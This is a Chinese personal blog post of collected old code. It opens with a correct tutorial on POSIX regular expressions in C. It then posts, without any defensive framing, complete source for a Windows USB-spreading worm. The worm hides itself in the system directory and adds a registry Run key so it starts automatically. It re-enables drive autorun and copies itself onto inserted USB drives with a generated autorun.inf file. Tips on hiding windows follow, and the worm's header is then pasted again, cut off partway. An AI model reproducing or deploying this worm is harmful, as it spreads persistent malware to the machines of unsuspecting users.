逝去的时光与记忆 关于收集一些代码回忆
记忆已经渐渐模糊,打开移动硬盘里面很多文件看到以前学校收集的那些源码想到了很多干脆很多心情也十分复杂。。。出来已经快三年了一切好快浑浑噩噩不知道怎么过来的。那些东西还在自己很少去看工作了时间没有了只能跟睡眠扣点时间了郁闷...那些源码很早就下载下来但是一直没有静下心研究。不能浪费就拿出来晒晒跟网友分享下:
关于c的正则表达式
看到大家讨论这方面的东西,作点贡献聊表各位高手对这个版快的无私奉献 :oops: 字符串时的复杂度,因此现在已经在许多Linux实用工具中得到了应用。千万不要以为正则表达式只是Perl、Python、Bash等脚本语言的专利,作为C语言程序员,用户同样可以在自己的程序中运用正则表达式。
标准的C和C++都不支持正则表达式,但有一些函数库可以辅助C/C++程序员完成这一功能,其中最著名的当数Philip Hazel的Perl-Compatible Regular Expression库,许多Linux发行版本都带有这个函数库。
编译正则表达式
为了提高效率,在将一个字符串与正则表达式进行比较之前,首先要用regcomp()函数对它进行编译,将其转化为regex_t结构:
- int regcomp(regex_t *preg, const char *regex, int cflags);
参数regex是一个字符串,它代表将要被编译的正则表达式;参数preg指向一个声明为regex_t的数据结构,用来保存编译结果;参数cflags决定了正则表达式该如何被处理的细节。
如果函数regcomp()执行成功,并且编译结果被正确填充到preg中后,函数将返回0,任何其它的返回结果都代表有某种错误产生。
匹配正则表达式
一旦用regcomp()函数成功地编译了正则表达式,接下来就可以调用regexec()函数完成模式匹配:
- int regexec(const regex_t *preg, const char *string, size_t nmatch,regmatch_t pmatch[], int eflags);
- typedef struct {
- regoff_t rm_so;
- regoff_t rm_eo;
- } regmatch_t;
参数preg指向编译后的正则表达式,参数string是将要进行匹配的字符串,而参数nmatch和pmatch则用于把匹配结果返回给调用程序,最后一个参数eflags决定了匹配的细节。
在调用函数regexec()进行模式匹配的过程中,可能在字符串string中会有多处与给定的正则表达式相匹配,参数pmatch就是用来保存这些匹配位置的,而参数nmatch则告诉函数regexec()最多可以把多少个匹配结果填充到pmatch数组中。当regexec()函数成功返回时,从string+pmatch[0].rm_so到string+pmatch[0].rm_eo是第一个匹配的字符串,而从string+pmatch[1].rm_so到string+pmatch[1].rm_eo,则是第二个匹配的字符串,依此类推。
释放正则表达式
无论什么时候,当不再需要已经编译过的正则表达式时,都应该调用函数regfree()将其释放,以免产生内存泄漏。
- void regfree(regex_t *preg);
函数regfree()不会返回任何结果,它仅接收一个指向regex_t数据类型的指针,这是之前调用regcomp()函数所得到的编译结果。
如果在程序中针对同一个regex_t结构调用了多次regcomp()函数,POSIX标准并没有规定是否每次都必须调用regfree()函数进行释放,但建议每次调用regcomp()函数对正则表达式进行编译后都调用一次regfree()函数,以尽早释放占用的存储空间。
报告错误信息
如果调用函数regcomp()或regexec()得到的是一个非0的返回值,则表明在对正则表达式的处理过程中出现了某种错误,此时可以通过调用函数regerror()得到详细的错误信息。
size_t regerror(int errcode, const regex_t *preg, char *errbuf, size_t errbuf_size);
参数errcode是来自函数regcomp()或regexec()的错误代码,而参数preg则是由函数regcomp()得到的编译结果,其目的是把格式化消息所必须的上下文提供给regerror()函数。在执行函数regerror()时,将按照参数errbuf_size指明的最大字节数,在errbuf缓冲区中填入格式化后的错误信息,同时返回错误信息的长度。
应用正则表达式
最后给出一个具体的实例,介绍如何在C语言程序中处理正则表达式。
- #include <stdio.h>;
- #include <sys/types.h>;
- #include <regex.h>;
- /* 取子串的函数 */
- static char* substr(const char*str, unsigned start, unsigned end)
- {
- unsigned n = end - start;
- static char stbuf[256];
- strncpy(stbuf, str + start, n);
- stbuf[n] = 0;
- return stbuf;
- }
- /* 主程序 */
- int main(int argc, char** argv)
- {
- char * pattern;
- int x, z, lno = 0, cflags = 0;
- char ebuf[128], lbuf[256];
- regex_t reg;
- regmatch_t pm[10];
- const size_t nmatch = 10;
- /* 编译正则表达式*/
- pattern = argv[1];
- z = regcomp(®, pattern, cflags);
- if (z != 0){
- regerror(z, ®, ebuf, sizeof(ebuf));
- fprintf(stderr, "%s: pattern '%s' \n", ebuf, pattern);
- return 1;
- }
- /* 逐行处理输入的数据 */
- while(fgets(lbuf, sizeof(lbuf), stdin)) {
- ++lno;
- if ((z = strlen(lbuf)) >; 0 && lbuf[z-1] == '\n')
- lbuf[z - 1] = 0;
- /* 对每一行应用正则表达式进行匹配 */
- z = regexec(®, lbuf, nmatch, pm, 0);
- if (z == REG_NOMATCH) continue;
- else if (z != 0) {
- regerror(z, ®, ebuf, sizeof(ebuf));
- fprintf(stderr, "%s: regcom('%s')\n", ebuf, lbuf);
- return 2;
- }
- /* 输出处理结果 */
- for (x = 0; x < nmatch && pm[x].rm_so != -1; ++ x) {
- if (!x) printf("%04d: %s\n", lno, lbuf);
- printf(" $%d='%s'\n", x, substr(lbuf, pm[x].rm_so, pm[x].rm_eo));
- }
- }
- /* 释放正则表达式 */
- regfree(®);
- return 0;
- }
上述程序负责从命令行获取正则表达式,然后将其运用于从标准输入得到的每行数据,并打印出匹配结果。执行下面的命令可以编译并执行该程序:
- # gcc regexp.c -o regexp
- # ./regexp 'regex[a-z]*' < regexp.c
- 0003: #include <regex.h>;
- $0='regex'
- 0027: regex_t reg;
- $0='regex'
- 0054: z = regexec(®, lbuf, nmatch, pm, 0);
- $0='regexec'
小结
对那些需要进行复杂数据处理的程序来说,正则表达式无疑是一个非常有用的工具。本文重点在于阐述如何在C语言中利用正则表达式来简化字符串处理,以便在数据处理方面能够获得与Perl语言类似的灵活性。
一个c病毒源代码
- #include <windows.h>
- #include <Shlwapi.h>
- #include <fstream.h>
- #include <TlHelp32.h>
- #include <Dbt.h>
- #pragma comment(lib,"shlwapi.lib")
- #define TIMER 1//计时器
- //function
- LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程
- //获取盘符
- TCHAR FirstDriveFromMask (ULONG unitmask);
- //病毒从U盘启动时用到的函数
- BOOL FileExist(TCHAR *path);//测试一个文件是否存在
- BOOL GetSelfPath(TCHAR *path);//Get the virus's path
- //BOOL FindU(TCHAR *u);//check whether u exist, u[2]
- BOOL GetSysPath(TCHAR *path);//得到系统路径
- BOOL CopyToSysAndSet(HWND hwnd);//复制自身到系统目录和设置
- BOOL SetFileAttrib(TCHAR *path);//设置path所指文件的属性
- BOOL RegAutoRun(TCHAR *path);//修改注册表,实现自启动
- //从C盘启动时用到函数
- BOOL CopyToUAndSet();//复制自己到U盘
- BOOL CreateAutoRunFile(TCHAR *path);//在U盘下生成autorun.inf文件
- BOOL FindSelf();//测试自己是否在已经执行了
- //global variable
- TCHAR szExePath[MAX_PATH];//the virus's path
- TCHAR U[2];//保存U盘的盘符
- TCHAR szSysPath[MAX_PATH];//system path
- //constant
- const TCHAR *szExeName="bbbbb.exe";
- const TCHAR *szSysName="aaaaa.exe";
- const TCHAR *szAutoRunFile="AutoRun.inf";
- int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,
- PSTR szCmdLine, int iCmdShow)
- {
- static TCHAR szAppName[]=TEXT ("UUUUUU");
- HWND hwnd;
- MSG msg;
- WNDCLASS wndclass;
- wndclass.style =0;
- wndclass.lpfnWndProc =WndProc;
- wndclass.cbClsExtra =0;
- wndclass.cbWndExtra =0;
- wndclass.hInstance =hInstance;
- wndclass.hIcon =0;
- wndclass.hCursor =0;
- wndclass.hbrBackground =0;
- wndclass.lpszMenuName =NULL;
- wndclass.lpszClassName =szAppName;
- if (!RegisterClass (&wndclass))
- {
- MessageBox (NULL,TEXT("Program requires Windows NT!"),
- szAppName, MB_ICONERROR);
- return 0;
- }
- hwnd = CreateWindow (szAppName, NULL,
- WS_DISABLED,
- 0, 0,
- 0, 0,
- NULL, NULL, hInstance, NULL);
- while (GetMessage(&msg, NULL, 0, 0))
- {
- TranslateMessage (&msg);
- DispatchMessage (&msg);
- }
- return msg.wParam;
- }
- LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
- {
- PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
- switch(wParam)
- {
- case DBT_DEVICEARRIVAL: //插入
- if (lpdb -> dbch_devicetype == DBT_DEVTYP_VOLUME)
- {
- PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;
- U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask);//得到u盘盘符
- //MessageBox(0,U,"Notice!",MB_OK);
- CopyToUAndSet();//拷到u盘
- }
- break;
- case DBT_DEVICEREMOVECOMPLETE: //设备删除
- break;
- }
- return LRESULT();
- }
- LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam)
- {
- switch(message)
- {
- case WM_Create: //处理一些要下面要用到的全局变量
- U[1]=':';
- GetSysPath(szSysPath);//得到系统路径
- SetTimer(hwnd,TIMER,5000,0);//启动计时器
- GetSelfPath(szExePath);//得到自身的路径
- return 0;
- case WM_TIMER: //timer message
- if(szExePath[0]==szSysPath[0]) //如果是系统盘启动的
- SendMessage(hwnd,WM_DEVICECHANGE,0,0);//检测有没有插入设备消息
- else
- {
- CopyToSysAndSet(hwnd);//拷到系统盘并自启动
- }
- return 0;
- case WM_DEVICECHANGE:
- OnDeviceChange(hwnd,wParam,lParam);
- return 0;
- case WM_DESTROY:
- KillTimer(hwnd,TIMER);
- PostQuitMessage(0);
- return 0;
- }
- return DefWindowProc(hwnd, message, wParam, lParam);
- }
- TCHAR FirstDriveFromMask(ULONG unitmask)
- {
- char i;
- for (i = 0; i < 26; ++i)
- {
- if (unitmask & 0x1)//看该驱动器的状态是否发生了变化
- break;
- unitmask = unitmask >> 1;
- }
- return (i + 'A');
- }
- BOOL GetSelfPath(TCHAR *path)
- {
- if(GetModuleFileName(NULL,path,MAX_PATH))//得到程序自身的目录
- {
- return TRUE;
- }
- else
- return FALSE;
- }
- BOOL GetSysPath(TCHAR *path)
- {
- return GetSystemDirectory(path,MAX_PATH);//得到系统路径
- }
- BOOL CopyToSysAndSet(HWND hwnd)
- {
- TCHAR szPath[MAX_PATH];
- lstrcpy(szPath,szSysPath);
- lstrcat(szPath,"\\");
- lstrcat(szPath,szSysName);//得到复制到系统目录的完整目录
- if(!FileExist(szPath))//检测系统目录是否已经存在复制的文件
- {
- CopyFile(szExePath,szPath,FALSE);
- RegAutoRun(szPath);
- return SetFileAttrib(szPath);
- }
- else
- {
- if(!FindSelf())//检测自己有没有运行
- {
- //MessageBox(0,szExePath,szPath,MB_OK);
- WinExec(szPath,SW_HIDE);//没有就执行
- SendMessage(hwnd,WM_CLOSE,0,0);//结束自己
- }
- }
- return FALSE;
- }
- BOOL FileExist(TCHAR *path)//检测PATH所指的路径的文件是否存在
- {
- int result;
- result=PathFileExists(path);
- if(result==1)
- return TRUE;
- else
- return FALSE;
- }
- BOOL SetFileAttrib(TCHAR *path)
- {
- return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
- }
- BOOL RegAutoRun(TCHAR *path)//修改注册表实现自启动
- {
- HKEY hkey;
- DWORD v=0;
- RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",&hkey);
- RegSetValueEx(hkey,"NoDriveTypeAutoRun",0,REG_DWORD,(LPBYTE)&v,sizeof(DWORD));
- if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run",
- &hkey)==ERROR_SUCCESS)
- {
- RegSetValueEx(hkey,szSysName,0,REG_SZ,(BYTE*)path,lstrlen(path));
- RegCloseKey(hkey);
- return TRUE;
- }
- else
- return FALSE;
- }
- BOOL CopyToUAndSet()
- {
- TCHAR szPath[MAX_PATH];
- lstrcpy(szPath,U);
- lstrcat(szPath,"\\");
- lstrcat(szPath,szExeName);//得到指向U盘的完整目录
- TCHAR szAutoFile[MAX_PATH];
- lstrcpy(szAutoFile,U);
- lstrcat(szAutoFile,"\\");
- lstrcat(szAutoFile,szAutoRunFile);
- if(!FileExist(szAutoFile))
- {
- CreateAutoRunFile(szAutoFile);
- SetFileAttrib(szAutoFile);
- }
- if(!FileExist(szPath))
- {
- CopyFile(szExePath,szPath,FALSE);
- return SetFileAttrib(szPath);
- }
- return FALSE;
- }
- BOOL CreateAutoRunFile(TCHAR *path) //在U盘下创建一个autorun.inf文件
- {
- ofstream fout;
- fout.open(path);
- if(fout)
- {
- fout<<"[AutoRun]"<<endl;
- fout<<"open="<<szExeName<<" e"<<endl;
- fout<<"shellexecute="<<szExeName<<" e"<<endl;
- fout<<"shell\\Auto\\command="<<szExeName<<" e"<<endl;
- fout<<"shell=Auto"<<endl;
- fout.close();
- return TRUE;
- }
- return FALSE;
- }
- BOOL FindSelf(){
- PROCESSENTRY32 pe;
- HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
- pe.dwSize=sizeof(PROCESSENTRY32);
- if(Process32First(hShot,&pe)){
- do{
- if(lstrcmp(pe.szExeFile,szSysName)==0)
- {
- CloseHandle(hShot);
- return TRUE;
- }
- }while(Process32Next(hShot,&pe));
- }
- CloseHandle(hShot);
- return FALSE;
- }
- 隐藏窗口:ShowWindow(false); (#include <windows.h>)
- 将程序暂停一秒后继续执行:sleep(1000); (同上)
- 删除文件:system("del 文件的路径");
- 运行文件:system("文件的路径");
- system函数(#include <iostream>)
- 复制文件:详见remove函数(#include <process.h>)
- -----------------------------------------------------------
- 一个不错的病毒完整源代码
- #include <windows.h>
- #include <Shlwapi.h>
- #include <fstream.h>
- #include <TlHelp32.h>
- #include <Dbt.h>
- #pragma comment(lib,"shlwapi.lib")
- #define TIMER 1//计时器
- //function
- LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程
- //获取盘符
- TCHAR FirstDriveFromMask (ULONG unitmask);